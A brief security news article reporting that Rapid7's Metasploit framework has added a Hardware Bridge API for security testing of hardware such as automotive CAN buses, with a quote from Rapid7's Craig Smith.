The Metasploit hacking toolkit now includes a new hardware bridge that makes it easier for users to analyze hardware devices.

The popular offensive hacking toolkit Metasploit is now more powerful: it includes a hardware bridge for conducting security tests on hardware. This is a great help to users who have to test hardware, including IoT devices.

Metasploit already includes more than 1,600 exploits and 3,300 modules, with a huge hacking community that works on new modules and scripts.


Up until now, Metasploit allowed the creation of custom scripts for hardware testing; now the update to the Hardware Bridge API will allow users to test a variety of hardware, including vehicles’ CAN buses.

The new Hardware Bridge API gives a valuable instrument to customers focused on the development of hardware exploits.

The first update to the Hardware Bridge API is specifically designed for testing automotive systems; Rapid7, which maintains the tool, will soon add other modules to extend the capabilities of its product.

Metasploit aims to be an established tool for a wide range of hardware platforms, including SCADA and industrial control systems (ICS), IoT systems, and software-defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.

“Metasploit condensed a slew of independent software exploits and tools into one framework and now we want to do the same for hardware,”

“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” explained Craig Smith, director of transportation research at Rapid7. “We’re working to give security professionals the resources they need to test and ensure the safety of their products — no matter what side of the virtual divide they’re on.”

Source: https://securityaffairs.co
